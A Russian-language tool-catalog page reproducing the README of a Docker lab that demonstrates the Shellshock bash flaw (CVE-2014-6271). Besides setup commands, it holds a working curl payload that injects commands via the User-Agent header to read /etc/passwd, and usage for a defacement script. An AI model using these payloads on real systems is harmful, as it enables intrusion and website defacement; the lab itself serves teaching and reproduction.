Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-6271 — Проект презентации CVE (ShellShock) с pdf, технической и воспроизводимой демонстрацией. | Kitploit
Инструменты/GitHubGitHub/radyio/cve-2014-6271
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubradyio/cve-2014-6271

CVE-2014-6271

Проект презентации CVE (ShellShock) с pdf, технической и воспроизводимой демонстрацией.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2014-6271

Описание

Этот проект позволяет воспроизвести уязвимость CVE-2014-6271, также известную как Shellshock. Shellshock — это уязвимость безопасности в Bash, которая позволяет выполнять вредоносный код через переменные окружения.

Цель этого проекта — продемонстрировать влияние данной уязвимости в среде Docker.

Предварительные требования

Перед началом убедитесь, что на вашем компьютере установлен Docker. Вы можете скачать Docker здесь.

Установка и запуск

1. Сборка Docker-образа

В корневом каталоге проекта выполните следующую команду для сборки Docker-образа:

root@kitploit:~
docker build -t ['image name'] .

Замените ['image name'] на имя, которое вы хотите присвоить Docker-образу.

2. Запуск Docker-контейнера

После сборки образа запустите контейнер из этого образа с помощью следующей команды:

root@kitploit:~
docker run -it --rm -p 8080:80 ['image name']

Это откроет доступ к сервису на порту 8080 вашего локального компьютера.

3. Доступ к приложению

Откройте браузер и перейдите по адресу http://localhost:8080. Вы сможете наблюдать поведение приложения и протестировать уязвимость.

4-1. Эксплуатация уязвимости

В другом терминале выполните следующую команду для эксплуатации уязвимости и чтения содержимого файла /etc/passwd:

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

Эта команда отправляет специально сформированный заголовок user-agent для эксплуатации Shellshock. Если уязвимость воспроизведена правильно, содержимое /etc/passwd отобразится в выводе терминала.

4-2. Эксплуатация уязвимости (скрипт exp_deface.sh)

Этот скрипт позволяет эксплуатировать уязвимость для дефейса целевой веб-страницы. Уязвимость основана на неправильной конфигурации CGI-скриптов, что позволяет выполнять произвольные команды на сервере.

Предварительные требования: Убедитесь, что цель уязвима к ошибке ShellShock. Убедитесь, что у вас есть необходимые разрешения для тестирования эксплойта на этой цели.

root@kitploit:~
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

Безопасность

Важно: Данная уязвимость должна использоваться только в целях тестирования и демонстрации в контролируемой среде. Не используйте этот проект в производственных средах.

Скачать инструмент